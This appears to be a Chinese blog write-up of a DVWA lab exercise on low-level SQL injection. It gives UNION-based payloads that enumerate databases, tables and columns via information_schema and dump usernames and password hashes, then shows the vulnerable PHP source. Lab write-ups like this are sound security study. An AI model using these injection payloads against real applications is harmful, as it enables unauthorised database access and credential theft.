【DVWA】SQL Injection-----------------------low

最新推荐文章于 2023-09-10 09:47:18 发布
最新推荐文章于 2023-09-10 09:47:18 发布
阅读量318 收藏
点赞数 1
分类专栏: sql注入 文章标签: mysql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/114106697
版权

【DVWA】SQL Injection-----------------------low

1、初步测试

输入单引号报错

输入' and 1=1#回显正常,说明存在sql注入

输入' or 1=1#,遍历出数据库内容:

image-20210225134225933

用order by测出主查询为两个字段

2、获取数据库名、用户名、版本

用union语句查询数据库名和用户名:

payload_1:' union select database(),user()#

image-20210225134617266

payload_2:' union select 1,concat_ws('~',database(),user(),version())#

分析:用concat()函数可以将多个查询结果拼接成一串;concat_ws()可以直接指定分隔符;优点是使用concat()或concat_ws()函数可以仅占用一个查询字段就返回多个结果,效率很高

image-20210225200220793

得到数据库名为dvwa,用户名为root@localhost版本号为5.7.26

3、获取表名

查询dvwa数据库中的表名:

' union select table_schema,table_name from information_schema.tables where table_schema='dvwa'#

image-20210225135019289

结果报出了这个错误,说是这个union操作非法,上网查了很多资料说是union两端查询的字段的排序规则不同问题解决

问题解决后,继续测试:

payload1:1' and 1=2 union select 1,group_concat(table_name) from information_schema.columns where table_schema='dvwa'#

分析:这里的and 1=2是为了屏蔽主查询的结果回显,使得回显点输出的敏感字符更多,或者减少干扰项

image-20210225201757435

获取的表名为guestbook,users。

4、获取列名

payload2:1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#

分析:这里的group_concat()函数作用是将column_name查询出来的内容拼接在一块(用,隔开),在回显点只允许输出一行的情况下,这种方法效率更高。

image-20210225201424718

5、获取user与password

payload_1:1' and 1=2 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#

image-20210225204331013

payload_2:1' and 1=2 union select concat(user_id,first_name,last_name),1 from users#

image-20210225205635147

注:concat()函数是将所有元素查询的结果拼接在一块,一次只能显示一次的遍历结果

group_concat()函数是将所有元素查询的结果拼接在一块,将每次遍历的结果用‘,’隔开

6、暴力破解密码

搜索md5在线破解工具:

image-20210225210050540

源码分析:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; //此处没有过滤或预处理,直接拼接到sql语句中,存在sql注入漏洞
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];
        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
0ak1ey
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-sql注入
Darklord.W
04-09 363
sql注入低中高步骤截图及说明 低: 判断注入类型 判断字段数 判断回显位置 查询数据库版本以及数据库名 查询数据库内表名 查询表内字段名 查询用户名密码 中: 发送到repeater 判断注入类型 猜字段数 判断回显位置 查询版本以及数据库 查询表名 查询字段名 高: Hig...
DVWA平台下Sql注入
林林木林林L的博客
03-10 431
Sql注入模块 输入一个数字,然后submit F12查看Cookies 打开sqlmap,输入命令,查看数据库 查表 查表里数据 查看字段的数据 Sql手工注入 上面用的是sqlmap获取数据库信息,现在使用手工注入来获取数据库的信息。 思路: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 ...
dvwa和pikachu靶场盲注语句
waxcj的博客
11-13 829
dvwa时间盲注 pikachu布尔盲注
DVWA靶场之SQL手工注入
pijrix的博客
09-10 667
DVWA靶场
欢迎来到训练场,SQL注入DVWA靶机
sinat_35855737的博客
05-11 994
手把手带你飞,在DVWA靶机上练习sql注入
DVWA-SQL InjectionSQL 注入)
weixin_50342860的博客
08-28 325
目录风险lowmediumhigh修复扩展 风险 是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限沦陷)。 手工注入常规思路 判断是否存在注入,注入是字符型还是数字型 猜解SQL查询语句中的字段数 确定回显位置 获取当前数据库 获取数据库中的表 获取表中的字段名 得到数据 low 分析源码,可以看到对前端传入的参数id没有做任何的过滤,明显存在手工注入,直接带入数
DVWA】--- 七、sql注入(SQL Injection)
qq_43168364的博客
05-31 329
SQL Injection 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 首先判断注入点 由回显可知注入点就在输入框中,也可以在URL中进行注入。接下来判断注入类型。另id=1’ 根据回显判断有可能是字符型注入点,使用and进行闭合看看是否是字符型注入点。 闭合后回显正常就是字符型注入点,这里尝试使用联合查询进行进行注入,首先判断它的字段数。 二、Medium级别 三、High级别 四、Impossible级别
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
在实际操作中,你可以通过PHPStudy建立环境,然后部署DVWASQL-li-labs,逐一攻破每一个安全挑战,这将有助于提升对Web安全的意识和应对能力。 总结一下,这个压缩包提供了一套完整的Web安全学习和实践环境,包括...
2020-12-01-DVWA.md
01-24
dvwa之command
2020-12-06-DVWAsql.md
01-24
dvwasql
DVWA-master.zip
11-16
DVWA-master.zip是一个包含了DVWA完整源代码和配置文件的压缩包,是搭建DVWA靶机环境的基础。 一、DVWA环境搭建 1. 解压与下载:首先,你需要下载DVWA-master.zip并将其解压缩到本地目录。确保你的系统已经安装了...
DVWA靶场
nidaxin的博客
01-29 2707
1.sql注入一般流程: 1)判断注入点:即判断是否存在sql注入,通常在参数后面加单引号,万能密码 2)判断查询的字段数 :order by 数字(数字从小到大,看是否报错) 3)确定回显位 4)获取信息函数: user() 获取当前用户用户 database() 获取当前数据库 version() 获取数据库版本 5)获取数据库名:1’ union select version(),database()# 6)获取表名: 1‘union select 1,table_name fro
DVWA靶机
qq_53616768的博客
08-13 224
生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码。生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码。输入1,将网址复制到sqlmap,同时抓包burp,将cookie复制到sqlmap。修改文件后缀,在上传是用burp抓包,并将后缀名修改回来。修改文件后缀,在上传是用burp抓包,并将后缀名修改回来。...
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 1778
【实训04】数据库SQL注入漏洞
DVWA靶场下的sql注入之文件读写
waxcj的博客
05-09 1282
DVWA的安装配置在我上一篇文章上写过了,不知道的可以去看看,这里直接讲sql注入如何获得文件读写权限 sql注入读写的根本条件 1:数据库用户得是高权限用户(root) 2:数据库下的secure_file_priv不是null(如果是也可以通过其他方法读取和写入,后文会讲,可以在MySQL命令行中用这条语句查看secure_file_priv是否为null SHOW VARIABLES LIKE "secure_file_priv"; 如果为null,我们可以在D:/phpstudy/.
DVWA SQL注入总结
iO快到碗里来
05-13 1108
DVWA SQL Injection 1.判断是否存在漏洞 输入1提交-回显用户信息 输入1‘提交-服务器报错:数据库Mysql 2.判断POC方式 输入 1‘ or ‘1’=’1 回显所有用户信息 在这里我们可以使用union注入 查询字段数 1‘ order by 1-- ;1’ order by 10-- ;…(二分法) 最后确定为2 确定回显点 -1‘ union select 1,2 -- ; 最后确定为2 查询用户名和数据库名 -1’ union select user(),dat
2021-02-06
zhaodoudou1221的博客
02-06 411
**DVWA-SQL Injection ** SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入(非盲注)的步骤 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.查数据库 5.查表 6.获取表中的字段名
关于SQL注入报错:Illegal mix of collations for operation ‘UNION‘原因剖析与验证
热门推荐
qq_43665434的博客
02-25 1万+
关于SQL注入报错:Illegal mix of collations for operation 'UNION’原因剖析与验证 今天练习了一下DVWASQL注入模块 使用了union注入时报错如下:Illegal mix of collations for operation ‘UNION’ payload:' union select table_schema,table_name from information_schema.tables where table_schema='dvwa'# 网
DVWAsqli-labs的区别
最新发布
04-17
DVWA(Damn Vulnerable Web Application)和sqli-labs(SQL Injection Labs)都是用于学习和测试网络安全的漏洞应用程序。它们的区别在于以下几个方面: 1. 目的:DVWA是一个包含多种不同类型漏洞的Web应用程序,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值